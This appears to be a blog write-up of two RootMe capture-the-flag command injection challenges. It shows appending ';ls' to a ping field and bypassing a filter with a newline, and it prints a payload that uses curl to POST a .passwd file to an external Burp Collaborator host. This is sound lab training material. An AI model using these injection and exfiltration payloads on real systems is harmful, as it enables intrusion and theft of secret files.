RootMe - Command Injection

RootMe – Command Injection Challenges

1. PHP - Command injection

Mission
Find a vulnerability in this service and exploit it.
You must manage to read index.php

Solution

1) open challenge and find ping page to localhost :

2) make normal ping request :

3) put ;ls at the end of ip to check it’s injectable or not:

4) after proof it’s injectable add ;ls -lah after ip to see all files :

5) find file with name .passwd try to cat it and cat not work so that i try more command and it’s success :

Finished. Happy Hacking!

2. Command injection - Filter bypass

Mission
Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.

Solution

1) open challenge and i find input to ping ip put ip and it’s back with ping ok :

2) add ;ls after ip but it’s back with syntax error :

3) open burp suite and tried payloads after that all i find /n %0a is work and curl is work :

4) now trying to extract data with curl :

5) now let’s create payload to our challenge i will use burp collab to receive request :

+0a%+curl+-X+POST+–data+”@.passwd”+e4jl0kjtbe9519gxifjw0lm2yt4ksbg0.oastify.com

6) open burp collab and i find request to it with data in .passwd .txt :

Finished. Happy Hacking!

---

Follow me:

• LinkedIn
• X